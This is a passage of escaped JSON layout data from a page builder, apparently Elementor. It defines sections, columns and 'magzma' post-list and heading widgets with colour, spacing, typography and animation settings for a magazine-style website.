us\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"#61c436\",\"post_icon_color2_post_list_1\":\"#007AFE\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"5qw1g6r\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Business\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"etel35k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"9\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"hwrnwkw\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"1\",\"category\":[\"9\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{